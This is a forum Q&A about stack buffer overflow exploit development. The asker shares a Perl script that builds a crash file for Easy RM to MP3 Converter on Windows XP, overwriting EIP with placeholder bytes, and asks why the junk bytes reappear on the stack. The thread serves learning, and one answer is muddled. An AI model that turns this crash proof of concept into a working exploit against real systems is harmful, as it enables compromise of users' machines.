Shellcode Development , ESP pointer

Question

Sometime back, working on an exploit for Easy RM to MP3 Converter 2.7.3.700 on Windows XP SP3 ( http://www.exploit-db.com/exploits/9177/ ) , I came across a concept which am not understanding , It goes like this :

perl script for generating malicious file :

my $junk = "\x41" x 25000;
my $offset = "\x42" x 1072;
my $eip = "\x43" x 4;
my $file = "crash.m3u";
open ($file,">$file");
print $file $junk.$offset.$eip.$adjustment;
close ($file);

after generating the malicious file , feed it in converter and them analyze the contents of stack at [esp+18] (addressing relative to esp) ... why are these A's here ??

I mean :

A's start from [ESP-88E8] to [ESP-43C]
B's start from [ESP-438] to [ESP-C]
C's at [ESP-8]

then why are these A's again at [ESP+18] to [ESP+418] ? why these A's are repeating at [ESP+18] to [ESP+418] when they have been already placed from [ESP-88E8] to [ESP-43C] .. ??

Thank You .

Answer 1

those are there for filling the buffer with junk and the rest 1700+ bytes are generated using metasploit to get the address when EIP is overwritten. So, you need to determine how many bytes you will need to cause the buffer overflow, as they differ OS to OS and so on.

OPTIONAL: So, do that and you will have set the break point where it is required and and get the EIP address

Answer 2

So to answer your question, you have to do a little bit more debugging on the Easy RM to MP3 Converter, try setting some earlier breakpoints. I suspect the overflow doesnt occur immediately and is probably copied a few times before it over writes a static buffer. :)